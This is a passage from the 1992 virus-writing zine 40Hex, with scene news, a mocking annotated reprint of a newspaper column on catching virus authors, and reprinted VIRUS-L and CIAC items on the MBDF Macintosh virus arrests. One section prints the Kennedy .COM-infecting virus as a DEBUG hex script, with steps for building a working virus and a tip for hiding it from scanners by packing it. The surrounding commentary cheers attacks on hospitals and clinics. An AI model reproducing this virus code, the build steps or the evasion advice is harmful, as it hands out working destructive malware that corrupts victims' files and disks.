half hour computer talk show on syndicated radio. I'm sure he wouldn't mind if
|
|||
|
we got on the show some time soon. Check your local radio guide for your local
|
|||
|
station and time... I am offering a standing bounty of $1,500 for the person
|
|||
|
willing to fly to Ohio and kick Crow Meisters ass for good. A minor would be
|
|||
|
preferred, being that he is under 18 and if I smashed him I could get sued or
|
|||
|
something. Just kidding, Crow Meister is cool with me, hihihihi... A new
|
|||
|
federal law is being considered which if passed will outlaw the authorship of
|
|||
|
computer viruses totally, research or not. Read more about that later in this
|
|||
|
issue... Hey, I might have a BBS up soon! I have been saying that for the past
|
|||
|
2 years haven't I? Well that's the news as I see it, it's nice to be writing
|
|||
|
for this rag again.
|
|||
|
|
|||
|
Check ya in 25 to life....
|
|||
|
|
|||
|
Hellraiser P/S
|
|||
|
1992
|
|||
|
|
|||
|
This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
|
|||
|
a disk in place of a fuckin print out...
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 006
|
|||
|
|
|||
|
Well, this little news "tid-bit" came from Attitude Adjuster, one of the
|
|||
|
few non-PHALCON/SKISM contributers (ok, the ONLY non P/S member), Thanks a
|
|||
|
lot dude, keep the submissions coming. The article itself is quite sad,
|
|||
|
and makes me question the intelligence of our opposition.
|
|||
|
|
|||
|
-)GHeap&Demo
|
|||
|
Thanx to CZ for THE line.
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
- We need Computer Virus Snitches -
|
|||
|
Written By Mike Royko, Tribune Media Services.
|
|||
|
Retyped by The Attitude Adjuster
|
|||
|
|
|||
|
============================================================================
|
|||
|
Millions of computer users are wondering how to protect themselves
|
|||
|
against the wave of viruses that are threatening their machines. I have a
|
|||
|
suggestion.[So do I, avoid Bnu 1.90Beta]
|
|||
|
First, they should remember that these viruses don't spring from
|
|||
|
nature. They are little computer programs that are created and sent on
|
|||
|
their way by people that are brainy, malicious and arrogant.[I am not
|
|||
|
brainy]
|
|||
|
So, the question is, how do you find the creators of computer
|
|||
|
virus programs?
|
|||
|
Because they are arrogant, it's likely that they want someone to
|
|||
|
know what a clever thing they have done. They won't hold a press conference
|
|||
|
[Actually, we do hold press conferences. See Michael Alexander@Computerworld]
|
|||
|
but chances are they will brag to a trusted friend or acquaintance or
|
|||
|
fellow hacker.
|
|||
|
It is sad, but the world is full of snitches.[Get a thesaurus] Look
|
|||
|
at John Gotti, the nation's biggest Mafia boss. There was a time when it
|
|||
|
was unthinkable for even the lowest-level Mafia soldier to blab. But now
|
|||
|
Gotti has to sit in court while his former right-hand man tells about how
|
|||
|
they got people whacked. [We whack people too]
|
|||
|
So if Mafia figures can be persuaded to tattle[Na-na-na-na-na], is
|
|||
|
there any reason to believe that nerds have a greater sense of honor and
|
|||
|
loyalty? [Yes, we also have brains]
|
|||
|
Of course[.] not, but how do you get them to do it?
|
|||
|
|
|||
|
Money. [Now yer talking... my mom is really the Dark Avenger, I want
|
|||
|
my money now.]
|
|||
|
|
|||
|
These companies [what companies, I only hit hospitals] could use
|
|||
|
petty cash to place ads in the computer magazines and on the electronic
|
|||
|
bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad
|
|||
|
space available]
|
|||
|
The ads would say something like: "A $50,000 reward for any
|
|||
|
information leading to the arrest and conviction of virus authors."
|
|||
|
[How can you convict a virus author. It isn't illegal. Go play Tank Wars.]
|
|||
|
The next question would be what to do with the virus makers once
|
|||
|
they have been caught. And that's the key to putting an end to the
|
|||
|
problem: something that could be posted on those electronic bulletin
|
|||
|
boards that might cause an aspiring virus-maker to go take a brisk walk
|
|||
|
instead.
|
|||
|
A judge would sit and listen to an attorney who would say some-
|
|||
|
thing like this:
|
|||
|
"Your honor, what we have here is an otherwise fine young man
|
|||
|
from a good family. His father is a brilliant scholar, and the son will
|
|||
|
someday be the same."[I am going to be a certified scholar when I grow up.]
|
|||
|
"What he did was no more than an intellectual prank, a cerebral
|
|||
|
challenge of sorts. Like the man who climbed Mount Everest because it was
|
|||
|
there, he created the virus and sent it fourth because it was there."
|
|||
|
Then, we can hope, the judge might say something like this:
|
|||
|
"Yes, I am impressed by the defendant's brain power. And I
|
|||
|
expected you to ask me to give him a slap on the wrist."
|
|||
|
"However, he is not a child. He is an adult. And I would think
|
|||
|
that so brilliant a grown man would know better than to amuse himself
|
|||
|
by screwing with the lives of strangers." [I haven't screwed one stranger]
|
|||
|
"It's as if he hid inside the businesses and institutions until
|
|||
|
they were closed and everyone had gone home. Then he came out and went
|
|||
|
through every filing cabinet and drawer and shredded or burned every bit
|
|||
|
of useful information he could find."[Cool! Lets try it.]
|
|||
|
"Now, counselor, what would you and your law partners say is some
|
|||
|
street mope [See Thesaurus] did that to your firm - crept in and destroyed
|
|||
|
every document in your offices? Including the names of clients that owe you
|
|||
|
money. Hah, you would be in here asking me to hang him from a tree."[I love
|
|||
|
hanging from trees]
|
|||
|
"So don't give me that smart kid from a good family routine.
|
|||
|
[I ain't smart, and family ain't good] He is a self-centered, insensitive,
|
|||
|
uncaring, arrogant goofball [And damn proud]. He didn't give a second
|
|||
|
thought to the chaos or heartbreak he would cause an adoption agency, a
|
|||
|
hardworking businessman or a medical clinic." [Yes I did. I aim for them.]
|
|||
|
"Therefore, I sentence him to the maximum sentence the law allows
|
|||
|
in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really
|
|||
|
terrible place, filled with all sorts of crude, insensitive hulks."
|
|||
|
[Jay-walkers]
|
|||
|
"Bailiff, please get the defendent up off the floor and administer
|
|||
|
some smelling salts."[More like, why is the defendant laughing?]
|
|||
|
"And change his trousers, quickly."[Fuck you]
|
|||
|
|
|||
|
[]comments added by Demogorgon and GHeap
|
|||
|
|
|||
|
============================================================================
|
|||
|
|
|||
|
|
|||
|
I hope you enjoyed that one as much as I did! Okay, I
|
|||
|
see some really neat things with this man's article. First off,
|
|||
|
I'm sure he's an adept programmer... that is, he can probably
|
|||
|
figure out how to get his VCR to tape something while he is
|
|||
|
off writing his brilliant articles. I enjoy his narrow-minded
|
|||
|
definition of virii (that was mentioned in 40Hex 5), of course,
|
|||
|
all virii are those evil overwriting, trigger date, resident,
|
|||
|
boot track infecting swine (yeah, he probably learned what a
|
|||
|
virus was from watching ABC News covering the Michaelangelo
|
|||
|
crisis!)
|
|||
|
I also enjoy his opinion that all virus authors are
|
|||
|
nerds. First off, what the hell is a nerd? I mean, I have
|
|||
|
written a virus before (not saying it was any good), but, I
|
|||
|
don't feel like a nerd! In fact, I feel quite superior to
|
|||
|
most of the idiots like this guy. And, I like his great
|
|||
|
statement about my loyalty. Yes, I'm gonna narc on [PHALCON/
|
|||
|
[Forget this again, and die]]SKISM for $50,000!!! Yeah, right.
|
|||
|
There are a lot of narcs on this not-so good earth, so choose
|
|||
|
your friends wisely.
|
|||
|
I'm quite sure that ads on BBS's (electronic bulletin
|
|||
|
boards! No... cork ones!) would just sufficiently pump up user
|
|||
|
discussion of virii. I'm not scared of fed intervention, and
|
|||
|
I doubt any authors I know are either.
|
|||
|
This was touched on in 40Hex 5, virus authors are not
|
|||
|
responsible for the spread of their virii unless they are
|
|||
|
actively spreading them! I mean, it's not my fault that K-Rad
|
|||
|
Man sent my Hard Drive Blender (slices, dices, minces sectors)
|
|||
|
to 1000 Bible boards in Utah. Apparently it hasn't dawned on
|
|||
|
this guy that most virii are not written to be destructive.
|
|||
|
Actually, that's a lie. There are a lot of virii out there that
|
|||
|
are descructive, but that is changing. People like the
|
|||
|
PHALCON/SKISM crew realize that not everything must be
|
|||
|
destructive, opening the doors to much larger virus projects
|
|||
|
(ie Bobisms)
|
|||
|
One more thing... QUIT EQUATING THE WORD 'hacker' TO
|
|||
|
EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'
|
|||
|
|
|||
|
|
|||
|
I'm gonna get this dude's phone #, I say we call him
|
|||
|
sometime...
|
|||
|
|
|||
|
|
|||
|
-The Attitude Adjuster-
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 007
|
|||
|
|
|||
|
|
|||
|
Lets see what good ole' Patty has to say about this:
|
|||
|
|
|||
|
|
|||
|
Virus Name: Kennedy
|
|||
|
Aliases: Dead Kennedy, 333, Kennedy-333
|
|||
|
Scan ID: [Kennedy]
|
|||
|
V Status: Endangered
|
|||
|
Discovered: April, 1990
|
|||
|
Symptoms: .COM growth; message on trigger dates (see text);
|
|||
|
crosslinking of files; lost clusters; FAT corruption
|
|||
|
Origin: Denmark
|
|||
|
Eff Length: 333 Bytes
|
|||
|
Type Code: PNCKF - Parasitic Non-Resident .COM Infector
|
|||
|
Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
|
|||
|
NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
|
|||
|
Novi 1.0.1+, Sweep 2.3.1+, UTScan
|
|||
|
Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files
|
|||
|
General Comments:
|
|||
|
The Kennedy virus was isolated in April 1990. It is a generic
|
|||
|
infector of .COM files, including COMMAND.COM.
|
|||
|
|
|||
|
This virus has three activation dates: June 6 (assassination of
|
|||
|
Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
|
|||
|
and November 22 (assassination of John F. Kennedy 1963) of any year.
|
|||
|
On activation, the virus will display a message the following
|
|||
|
message:
|
|||
|
|
|||
|
"Kennedy is dead - long live 'The Dead Kennedys'"
|
|||
|
|
|||
|
The following text strings can be found in the viral code:
|
|||
|
|
|||
|
"\command.com"
|
|||
|
"The Dead Kennedys"
|
|||
|
|
|||
|
Systems infected with the Kennedy virus will experience
|
|||
|
cross-linking of files, lost clusters, and file allocation table
|
|||
|
errors (including messages that the file allocation table is bad).
|
|||
|
|
|||
|
|
|||
|
--------------------------------Cut Here------------------------------------
|
|||
|
|
|||
|
n kennedy.com
|
|||
|
e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8
|
|||
|
e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81
|
|||
|
e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74
|
|||
|
e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00
|
|||
|
e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20
|
|||
|
e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89
|
|||
|
e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B
|
|||
|
e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D
|
|||
|
e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33
|
|||
|
e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81
|
|||
|
e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA
|
|||
|
e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8
|
|||
|
e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94
|
|||
|
e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01
|
|||
|
e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C
|
|||
|
e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8
|
|||
|
e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00
|
|||
|
e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43
|
|||
|
e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B
|
|||
|
e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22
|
|||
|
e 0240 54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79
|
|||
|
e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
rcx
|
|||
|
027F
|
|||
|
w
|
|||
|
q
|
|||
|
|
|||
|
---------------------------------Cut Here-----------------------------------
|
|||
|
|
|||
|
|
|||
|
Ok there it is. Not the most impressive virus around and its caught by just
|
|||
|
about every scan on the market, but take PKLite to it and then remove the PKLite
|
|||
|
header (Use NOLITE in this issue) and no one will be able to find it. Anyway it
|
|||
|
gets the job done.
|
|||
|
|
|||
|
To make the above hex into a working file, first cut on the dotted lines.
|
|||
|
Name the resulting file KENNEDY.TXT.
|
|||
|
Then: DEBUG < KENNEDY.TXT and you'll have a working virus.
|
|||
|
|
|||
|
|
|||
|
-Instigator
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 008
|
|||
|
|
|||
|
Take a look at this. I picked it up on fidonet, originally from Virus-L
|
|||
|
digest. all the stuff in *< >*'s are my comments.
|
|||
|
- Demogorgon
|
|||
|
|
|||
|
------------------------------
|
|||
|
VIRUS-L Digest Wednesday, 26 Feb 1992 Volume 5 : Issue 44
|
|||
|
------------------------------
|
|||
|
|
|||
|
Date: Tue, 25 Feb 92 10:10:14 -0500
|
|||
|
>From: mha@baka.ithaca.ny.us (Mark Anbinder)
|
|||
|
Subject: MBDF Suspects Arrested (Mac)
|
|||
|
|
|||
|
The Cornell Daily Sun reported in this morning's issue that two
|
|||
|
Cornell University sophomores, David Blumenthal and Mark Pilgrim, were
|
|||
|
arrested Monday evening and arraigned in Ithaca City Court on one
|
|||
|
count each of second degree computer tampering, in connection with the
|
|||
|
release of the MBDF virus that infected Macs worldwide over the last
|
|||
|
several days. The two are being held in Tompkins County Jail.
|
|||
|
*< huh? How does one get arrested for spreading a virus, you ask? read on >*
|
|||
|
Further charges are pending.
|
|||
|
|
|||
|
---
|
|||
|
** many lines of mail routing crap have been deleted **
|
|||
|
|
|||
|
Date: Tue, 25 Feb 1992 11:47:32 PST
|
|||
|
>From: lipa@camis.stanford.edu (Bill Lipa)
|
|||
|
Subject: Alleged MBDF virus-creators arrested at Cornell
|
|||
|
|
|||
|
"Computer Virus Traced to Cornell Students"
|
|||
|
|
|||
|
by Jeff Carmona
|
|||
|
|
|||
|
[The Cornell Daily Sun, 25 February 1992]
|
|||
|
|
|||
|
Two Cornell students were arrested yesterday for allegedly creating and
|
|||
|
launching *< launching ? Bon voyage, we launched you !>* a computer virus that
|
|||
|
crippled computers around the world, according to M. Stuart Lynn, the
|
|||
|
University's vice president for information technologies.
|
|||
|
David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
|
|||
|
Public Safety officers and arraigned in Ithaca City Court on one count of
|
|||
|
second-degree computer tampering, a misdemeanor, *< cool, its only a
|
|||
|
misdemeanor, how bad could it be ? >* Lynn said.
|
|||
|
Both students were remanded to the Tompkins County Jail and remained in
|
|||
|
custody early this morning. They are being held on $2,000 cash or $10,000
|
|||
|
bail bond, officials said.
|
|||
|
Cornell received national attention in Nov. 1988 when Robert T. Morris
|
|||
|
Jr., a former graduate student, was accused of unleashing a computer virus
|
|||
|
into thousands of government and university computers.
|
|||
|
Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined
|
|||
|
$10,000, given a three-year probation and ordered to do 400 hours of community
|
|||
|
service by a federal judge in Syracuse, according to Linda Grace-Kobas,
|
|||
|
*< Whats a Koba?? >* director of the Cornell News Service.
|
|||
|
Lynn would not compare the severity of the current case with Morris',
|
|||
|
saying that "each case is different."
|
|||
|
Lynn said the virus, called "MBDFA" was put into three Macintosh games --
|
|||
|
Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle.
|
|||
|
On Feb. 14, the games were launched from Cornell to a public archive at
|
|||
|
Stanford University in Palo Alto, Calif, Lynn said.
|
|||
|
*< I guess these guys actually put it up on the archive under their own >*
|
|||
|
*< accounts! Don't they know they can trace that stuff? duhhh... >*
|
|||
|
From there, the virus spread to computers in Osaka, Japan and elsewhere around
|
|||
|
the world *< the archive was a dumb idea if thats how they got caught, but it
|
|||
|
spread like hell >* when users connected to computer networks via modems, he
|
|||
|
added. It is not known how many computers the virus has affected worldwide, he
|
|||
|
explained.
|
|||
|
When computer users downloaded the infected games, the virus caused "a
|
|||
|
modification of system software," *< oooh...lets not get too technical >* Lynn
|
|||
|
said. "This resulted in unusual behavior and system crashes," he added.
|
|||
|
Lynn said he was not aware of anyone at Cornell who reported finding the
|
|||
|
virus on their computers.
|
|||
|
The virus was traced to Cornell last Friday, authorities were quickly
|
|||
|
notified and an investigation began, Lynn said.
|
|||
|
"We absolutely deplore this kind of bahavior," Lynn said. "We will pursue
|
|||
|
this matter to the fullest."
|
|||
|
Armed with search warrants, Public Safety investigators removed more than
|
|||
|
a dozen crates full of evidence from the students' residences in Baker and
|
|||
|
Founders halls on West Campus. *< sounds like a typical, over-kill bust to
|
|||
|
me. If you don't know what it is, take it. >*
|
|||
|
Public Safety officials refused to disclose the contents of the crates or
|
|||
|
issue any comment about the incident when contacted repeatedly by phone last
|
|||
|
night. *< thats because they don't know what the fuck the stuff is >*
|
|||
|
"We believe this was dealt with very quickly and professionally," Lynn
|
|||
|
said.
|
|||
|
The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today
|
|||
|
and additional charges are pending, according to Grace-Kobas.
|
|||
|
Because spreading a computer virus violates federal laws, "conceivably,
|
|||
|
the FBI could be involved," she added. Officials with the FBI could not be
|
|||
|
reached to confirm or deny this.
|
|||
|
Blumenthal and Pilgrim, both 19-year-olds, were current student employees
|
|||
|
at Cornell Information Technologies (CIT), Lynn said. He would not say
|
|||
|
whether the students launched the virus from their residence hall rooms or
|
|||
|
From a CIT office.
|
|||
|
Henrik N. Dullea '61, vice president for University relations, said he
|
|||
|
thinks "the act will immediately be associated with the University," not
|
|||
|
only with the individual students charged.
|
|||
|
Because a major virus originated from a Cornell student in the past, this
|
|||
|
latest incident may again "bring a negative reaction to the entire
|
|||
|
institution," Dullea said. *< "blah, blah, blah" >*
|
|||
|
"These are very selfish acts," Lynn said, referring to the intentional
|
|||
|
distribution of computer viruses, because innocent people are harmed.
|
|||
|
Lynn said he was unaware of the students' motive for initiating the virus.
|
|||
|
Lynn said CIT put out a notice yesterday to inform computer users about the
|
|||
|
"very virulent" virus. A virus-protection program, such as the new version of
|
|||
|
Disinfectant, can usually cure computers, but it may be necessary to "rebuild
|
|||
|
the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your-
|
|||
|
hard-drive" !>* in some cases, he added.
|
|||
|
A former roommate of Blumenthal said he was not surprised by news of the
|
|||
|
arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
|
|||
|
'95, his roommate from last semester. "He was in front of the computer all
|
|||
|
day," Fuller said.
|
|||
|
Blumenthal, who had a modem, would "play around with viruses because they
|
|||
|
were a challenge to him," Fuller said. He said that, to his knowledge,
|
|||
|
Blumenthal had never released a virus before.
|
|||
|
|
|||
|
-->-<------ Cut Here --------------------------
|
|||
|
|
|||
|
------------------------------
|
|||
|
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
|
|||
|
------------------------------
|
|||
|
|
|||
|
Date: Wed, 26 Feb 92 11:08:45 -0800
|
|||
|
>From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
|
|||
|
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)
|
|||
|
|
|||
|
NO RESTRICTIONS
|
|||
|
_____________________________________________________
|
|||
|
The Computer Incident Advisory Capability
|
|||
|
___ __ __ _ ___
|
|||
|
/ | / \ /
|
|||
|
\___ __|__ /___\ \___
|
|||
|
_____________________________________________________
|
|||
|
INFORMATION BULLETIN
|
|||
|
|
|||
|
New Virus on Macintosh Computers: MBDF A
|
|||
|
|
|||
|
February 25, 1992, 1130 PST Number C-17
|
|||
|
|
|||
|
________________________________________________________________________
|
|||
|
NAME: MBDF A virus
|
|||
|
PLATFORM: Macintosh computers-except MacPlus and SE (see below)
|
|||
|
DAMAGE: May cause program crashes
|
|||
|
SYMPTOMS: Claris applications indicate they have been altered; some
|
|||
|
shareware may not work, unexplained system crashes
|
|||
|
DETECTION &
|
|||
|
ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6,
|
|||
|
VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
|
|||
|
________________________________________________________________________
|
|||
|
Critical Facts about MBDF A
|
|||
|
|
|||
|
A new Macintosh virus, MBDF A, (named for the resource it exploits)
|
|||
|
has been discovered. This virus does not appear to maliciously cause
|
|||
|
damage, but simply copies itself from one application to another.
|
|||
|
MBDF A was discovered at two archive sites in newly posted game
|
|||
|
applications, and has a high potential to be very widespread.
|
|||
|
|
|||
|
Infection Mechanism
|
|||
|
|
|||
|
This virus is an "implied loader" virus, and it works in a similar
|
|||
|
manner to other implied loader viruses such as CDEF and MDEF. Once
|
|||
|
the virus is active, clean appliacation programs will become infected
|
|||
|
as soon as they are executed. MBDF A infects only applications, and
|
|||
|
does not affect data files. This virus replicates under both System 6
|
|||
|
and System 7. While MBDF A may be present on ALL types of Macintosh
|
|||
|
systems, it will not spread if the infected system is a MacPlus or a
|
|||
|
Mac SE (although it does spread on an SE/30).
|
|||
|
|
|||
|
Potential Damage
|
|||
|
|
|||
|
The MBDF A virus has no malicious damaging characteristics, however,
|
|||
|
it may cause programs to inexplicably crash when an item is selected
|
|||
|
from the menu bar. Some programs, such as the shareware
|
|||
|
"BeHierarchic" program, have been reported to not operate correctly
|
|||
|
when infected. Applications written with self-checking code, such as
|
|||
|
those written by the Claris corporation, will inform the user that
|
|||
|
they have been altered.
|
|||
|
|
|||
|
When MBDF A infects the system file, it must re-write the entire
|
|||
|
system file back to disk; this process may take two or three minutes.
|
|||
|
If the user assumes the system has hung, and reboots the Macintosh
|
|||
|
while this is occuring, the entire system file will be corrupted and
|
|||
|
an entire reload of system software must then be performed.
|
|||
|
|
|||
|
This virus can be safely eradicated from most infected programs,
|
|||
|
although CIAC recommends that you restore all infected files from an
|
|||
|
uninfected backup.
|
|||
|
|
|||
|
Detection and Eradication
|
|||
|
|
|||
|
Because MBDF A has been recently discovered, only anti-viral packages
|
|||
|
updated since February 20, 1992 will locate and eradicate this virus.
|
|||
|
All the major Macintosh anti-viral product vendors are aware of this
|
|||
|
virus and have scheduled updates for their products. These updates
|
|||
|
have all been available since February 24, 1992. The updated versions
|
|||
|
of some products are Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6,
|
|||
|
SAM 3.0, VirusDetective 5.0.2, and Rival 1.1.10. Some Macintosh
|
|||
|
applications (such as the Claris software mentioned above) may contain
|
|||
|
self-verification procedures to ensure the program is valid before
|
|||
|
each execution; these programs will note unexpected alterations to
|
|||
|
their code and will inform the user.
|
|||
|
|
|||
|
MBDF A has been positively identified as present in two shareware
|
|||
|
games distributed by reliable archive sites: "Obnoxious Tetris" and
|
|||
|
"Ten Tile Puzzle". The program "Tetricycle" (sometimes named
|
|||
|
"Tetris-rotating") is a Trojan Horse program which installs the virus.
|
|||
|
If you have downloaded these or any other software since February 14,
|
|||
|
1992 (the day these programs were loaded to the archive sites), CIAC
|
|||
|
recommends that you acquire an updated version of an anti-viral
|
|||
|
product and scan your system for the existence of MBDF A.
|
|||
|
|
|||
|
For additional information or assistance, please contact CIAC:
|
|||
|
|
|||
|
Karyn Pichnarczyk
|
|||
|
(510) 422-1779 or (FTS) 532-1779
|
|||
|
karyn@cheetah.llnl.gov
|
|||
|
|
|||
|
Call CIAC at (510)422-8193/(FTS)532-8193.
|
|||
|
Send e-mail to ciac@llnl.gov
|
|||
|
|
|||
|
PLEASE NOTE: Many users outside of the DOE and ESnet computing
|
|||
|
communities receive CIAC bulletins. If you are not part of these
|
|||
|
communities, please contact your agency's response team to report
|
|||
|
incidents. Some of the other teams include the NASA NSI response
|
|||
|
team, DARPA's CERT/CC, NAVCIRT, and the Air Force response team. Your
|
|||
|
agency's team will coordinate with CIAC.
|
|||
|
|
|||
|
CIAC would like to thank Gene Spafford and John Norstad, who provided
|
|||
|
some of the information used in this bulletin. This document was
|
|||
|
prepared as an account of work sponsored by an agency of the United
|
|||
|
States Government. Neither the United States Government nor the
|
|||
|
University of California nor any of their employees, makes any
|
|||
|
warranty, express or implied, or assumes any legal liability or
|
|||
|
responsibility for the accuracy, completeness, or usefulness of any
|
|||
|
information, apparatus, product, or process disclosed, or represents
|
|||
|
that its use would not infringe privately owned rights. Reference
|
|||
|
herein to any specific commercial products, process, or service by
|
|||
|
trade name, trademark, manufacturer, or otherwise, does not
|
|||
|
necessarily constitute or imply its endorsement, recommendation or
|
|||
|
favoring by the United States Government or the University of
|
|||
|
California. The views and opinions of authors expressed herein do not
|
|||
|
necessarily state or reflect those of the United States Government or
|
|||
|
the University of California, and shall not be used for advertising or
|
|||
|
product endorsement purposes.
|
|||
|
|
|||
|
-->-<----- Cut Here -------------------------
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
------------------------------
|
|||
|
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
|
|||
|
------------------------------
|
|||
|
|
|||
|
Date: Wed, 26 Feb 92 15:32:02 -0500
|
|||
|
>From: mha@baka.ithaca.ny.us (Mark Anbinder)
|
|||
|
Subject: Cornell MBDF Press Release (Mac)
|
|||
|
|
|||
|
_____________________________________________________
|
|||
|
PRESS RELEASE ISSUED BY CORNELL NEWS SERVICE 2/25/91
|
|||
|
|
|||
|
Students charged
|
|||
|
with releasing
|
|||
|
computer virus
|
|||
|
|
|||
|
By Linda Grace-Kobas
|
|||
|
|
|||
|
Following a university investigation that tracked a computer virus and
|
|||
|
its originators, two Cornell students were arrested and charged with
|
|||
|
computer tampering for allegedly launching a computer virus embedded in
|
|||
|
three games into national computer archives. Arraigned Feb. 24 in
|
|||
|
Ithaca City Court were David S. Blumenthal, 19, a sophomore in the
|
|||
|
College of Engineering, and Mark Andrew Pilgrim, 19, a sophomore in the
|
|||
|
College of Arts and Sciences. They were charged with computer tampering
|
|||
|
in the second degree, a Class A misdemeanor. The pair is being held in
|
|||
|
Tompkins County Jail with bail set at $2,000 cash bond or $10,000
|
|||
|
property bond. At a hearing Tuesday afternoon, Judge Sherman returned
|
|||
|
the two to jail with the same bond and recommended that they remain in
|
|||
|
jail until at least Friday pending the federal investigation. A
|
|||
|
preliminary hearing is set for April 10.
|
|||
|
|
|||
|
Both students were employed by Cornell Information Technologies, which
|
|||
|
runs the university's computer facilities. Pilgrim worked as a student
|
|||
|
operator in an Apple Macintosh facility from which the virus is believed
|
|||
|
to have been launched. The university's Department of Public Safety is
|
|||
|
working with the Tompkins County district attorney's office, and
|
|||
|
additional charges are expected to be filed. The Federal Bureau of
|
|||
|
Investigation has contacted the university to look at possible violations
|
|||
|
of federal laws, officials said. The Ithaca Police Department is also
|
|||
|
assisting in the investigation.
|
|||
|
|
|||
|
"We absolutely abhor this type of behavior, which appears to violate the
|
|||
|
university's computer abuse policy as well as applicable state and
|
|||
|
federal law," commented M. Stuart Lynn, vice president for information
|
|||
|
technologies, who headed the investigation to track the originators of
|
|||
|
the virus. "Cornell will pursue all applicable remedies under our own
|
|||
|
policies and will cooperate with law enforcement authorities."
|
|||
|
|
|||
|
Lynn said Cornell was alerted Feb. 21 that a Macintosh computer virus
|
|||
|
embedded in versions of three computer games, Obnoxious Tetris,
|
|||
|
Tetricycle and Ten Tile Puzzle, had possibly been launched through a
|
|||
|
Cornell computer. A virus is normally embedded in a program and only
|
|||
|
propagates to other programs on the host system, he explained.
|
|||
|
Typically, when an infected application is run, the virus will attack the
|
|||
|
system software and then other applications will become infected as they
|
|||
|
are run.
|
|||
|
|
|||
|
The virus, MBDF-A, had been deposited on Feb. 14 directly and indirectly
|
|||
|
into several computer archives in the U.S. and abroad, including
|
|||
|
SUMEX-AIM at Stanford University and archives at the University of Texas,
|
|||
|
the University of Michigan and another in Osaka, Japan. These archives
|
|||
|
store thousands of computer programs available to users of Internet, the
|
|||
|
worldwide computer network.
|
|||
|
|
|||
|
Macintosh users who downloaded the games to their computers were subject
|
|||
|
to a variety of problems, notably the modification of system software and
|
|||
|
application programs, resulting in unusual behavior and possible system
|
|||
|
crashes. Apparently, there was no intent to destroy data, Lynn said, but
|
|||
|
data could be destroyed in system crashes.
|
|||
|
|
|||
|
Reports of the virus have been received from across the United States and
|
|||
|
around the world, including Wales, Britain, Lynn said, adding that he has
|
|||
|
no estimate for the number of individuals who might have obtained the
|
|||
|
games.
|
|||
|
|
|||
|
As soon as the virus was identified, individuals and groups across the
|
|||
|
country involved with tracking viruses sent messages across computer
|
|||
|
networks to alert users who might have been affected by the virus, Lynn
|
|||
|
added. The virus has since been removed from all archives and
|
|||
|
"disinfectant" software available to the Internet community has been
|
|||
|
modified so that individual Macintosh users can purge their computers of
|
|||
|
it.
|
|||
|
|
|||
|
"Our sense is that the virus was controlled very rapidly," he said. In
|
|||
|
1988, Cornell received national attention when graduate student Robert T.
|
|||
|
Morris Jr. launched a computer virus into important government and
|
|||
|
university research networks. That virus, actually considered a "worm"
|
|||
|
since it was self-perpetuating, caused major damage in high-level
|
|||
|
systems. Morris was convicted under the 1986 Computer Fraud and Abuse
|
|||
|
Act and fined $10,000, given three years probation and ordered to do 400
|
|||
|
hours of community service by a federal judge in Syracuse, N.Y.
|
|||
|
|
|||
|
The new virus differs greatly from the Morris worm, Lynn said. "This
|
|||
|
virus is not to be compared with the Morris worm, which independently
|
|||
|
moved from machine to machine across the network," he explained. All
|
|||
|
Macintosh users should take appropriate measures to be certain their
|
|||
|
systems are not infected with the virus.
|
|||
|
|
|||
|
News Service science writer William Holder also contributed to
|
|||
